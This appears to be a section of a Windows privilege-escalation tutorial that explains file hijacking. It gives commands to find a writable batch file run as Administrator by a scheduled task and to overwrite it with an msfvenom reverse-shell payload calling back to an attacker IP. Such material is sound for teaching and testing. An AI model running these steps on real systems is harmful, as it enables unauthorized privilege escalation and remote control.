Hijacks

Hijacking in Windows refers to replacing or modifying an executable file, library, or script that a trusted process or scheduled mechanism automatically loads. When the file is writable by a lower-privileged user, it can be overwritten with malicious code. Upon execution by the privileged process or task, the attacker’s code runs in the same security context, often leading to privilege escalation or persistence. This technique applies to multiple file types: service binaries (.exe), dynamic-link libraries (.dll), and executable scripts such as batch files (.bat, .cmd) or PowerShell scripts (.ps1). The underlying principle remains the same—leveraging weak file permissions to replace a trusted component that Windows or applications expect to execute.

Batch Script Hijack

A batch file (.bat or .cmd) is a plain-text script that executes a sequence of Windows commands. It is used to automate tasks such as file management, program execution, or system configuration. Because batch files run in the context of the invoking user or process, they can be abused for persistence, privilege escalation, or post-exploitation if a writable file is executed by a privileged service or scheduled task.

# List the file's contents
> type c:\tasks\my_job
<SNIP>

<Interval>PT1M</Interval> # Runs every minute
<Exec>
<Command>C:\Windows\System32\cmd.exe</Command>
<Arguments>/c C:\Windows\Logs\my_task.bat</Arguments> # Executes this file
</Exec>
<Principals>
<UserId>Administrator</UserId> # Runs as Administrator

<SNIP>

# Check the batch file's permissions
> icacls c:\windows\logs\my_task.bat
c:\windows\logs\my_task.bat Everyone:(RX,W) # File is writable

# Create a revershe shell payload
msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.49.117 LPORT=80 > my_task.bat